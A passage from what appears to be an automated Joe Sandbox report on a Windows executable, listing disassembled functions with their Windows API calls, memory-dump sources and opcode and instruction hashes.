                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$InputSend
                                                                                              • String ID:
                                                                                              • API String ID: 2221674350-0
                                                                                              • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                              • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                              • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                              • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                              Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$_wcscat
                                                                                              • String ID:
                                                                                              • API String ID: 2037614760-0
                                                                                              • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                              • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                              • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                              • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                              Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                              • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                              • String ID:
                                                                                              • API String ID: 960795272-0
                                                                                              • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                              • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                              • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                              • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                              Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                              • EndPaint.USER32(?,?), ref: 00447D13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                              • String ID:
                                                                                              • API String ID: 4189319755-0
                                                                                              • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                              • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                              • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                              • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                              Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                              • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                              • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                              • String ID:
                                                                                              • API String ID: 1976402638-0
                                                                                              • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                              • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                              • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                              • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                              Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 642888154-0
                                                                                              • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                              • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                              • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                              • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                              Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Copy$ClearErrorLast
                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                              • API String ID: 2487901850-572801152
                                                                                              • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                              • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                              • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                              • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                              Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Enable$Show$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 1871949834-0
                                                                                              • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                              • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                              • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                              • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                              Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                              • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                              • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                              • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                              Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                              • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                              • SendMessageW.USER32 ref: 00471AE3
                                                                                              • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                              • String ID:
                                                                                              • API String ID: 3611059338-0
                                                                                              • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                              • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                              • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                              • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                              Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                              • String ID:
                                                                                              • API String ID: 1640429340-0
                                                                                              • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                              • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                              • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                              • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                              Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                              • _wcslen.LIBCMT ref: 004438CD
                                                                                              • _wcslen.LIBCMT ref: 004438E6
                                                                                              • _wcstok.LIBCMT ref: 004438F8
                                                                                              • _wcslen.LIBCMT ref: 0044390C
                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                              • _wcstok.LIBCMT ref: 00443931
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 3632110297-0
                                                                                              • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                              • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                              • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                              • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                              Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                              • String ID:
                                                                                              • API String ID: 752480666-0
                                                                                              • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                              • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                              • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                              • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                              Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                              • String ID:
                                                                                              • API String ID: 3275902921-0
                                                                                              • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                              • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                              • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                              • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                              Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                              • String ID:
                                                                                              • API String ID: 3275902921-0
                                                                                              • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
